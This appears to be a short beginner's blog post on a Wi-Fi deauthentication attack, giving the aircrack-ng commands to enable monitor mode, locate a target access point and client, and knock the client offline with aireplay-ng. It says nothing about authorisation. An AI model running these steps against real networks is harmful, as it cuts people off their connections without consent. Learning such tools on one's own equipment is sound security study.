Ethical Hacking Deauth Attack
Introduction:
Recently I’ve decided I want to start learning more about networking. I feel very confident in my development skills so I wanted to expand my horizons into a new subject. In order to do this I needed to find something interesting to dive into (I’ve always been better at ‘learn by doing’). I’m a hands on person, so when I came across a few ethical hacking courses I thought it would be the perfect place to start. For this post I’m going to walk through some of the ethical hacking tools available on Kali Linux and other distributions.
Prerequisites:
There are a few packages you’ll need to install to follow along:
- airmon-ng
- airodump-ng
- aireplay-ng
These three programs will allow us to monitor local wifi networks and the packets being transferred between clients/hosts. Another prerequisite is a wifi dongle. You’ll need one that allows ‘monitor mode’. This functionality allows the wifi dongle to be used to monitor local networks for packets/communication.
Set Wifi Card to ‘Monitor Mode’:
- type ‘ifconfig’ to list the different network interfaces connected to your linux system
- Type ‘ifconfig [name_of_interface] down’ to deactivate that interface
- Type ‘iwconfig [name_of_interface] mode monitor’ to activate monitor mode
- Type ‘ifconfig [name_of_interface] up’ to reactivate that interface
Use airodump-ng to monitor local wifi networks:
Type ‘airodump-ng [name_of_interface]’
The two most important columns in the above put is the ‘BSSID’, this is the MAC address of the different wifi hotspots that are close by. The ‘CH’ is also important, this is the channel of that wifi hotspot and you’ll be using it in the next command.
Use airodump-ng to monitor one of the wifi hotspots in range:
Type ‘airodump-ng –bssid [bssid] –channel [channel] [name_of_interface]’
Use aireplay-ng to deauth the Client from the Wifi Host:
Type ‘aireplay-ng –deauth [number of attacks] -a [bssid of target wifi] -c [mac address of target client] [wifi interface]
Putting all of theses commands together will result in deauthing the client from the host network and result in that user being blocked until the deauth attack is terminated.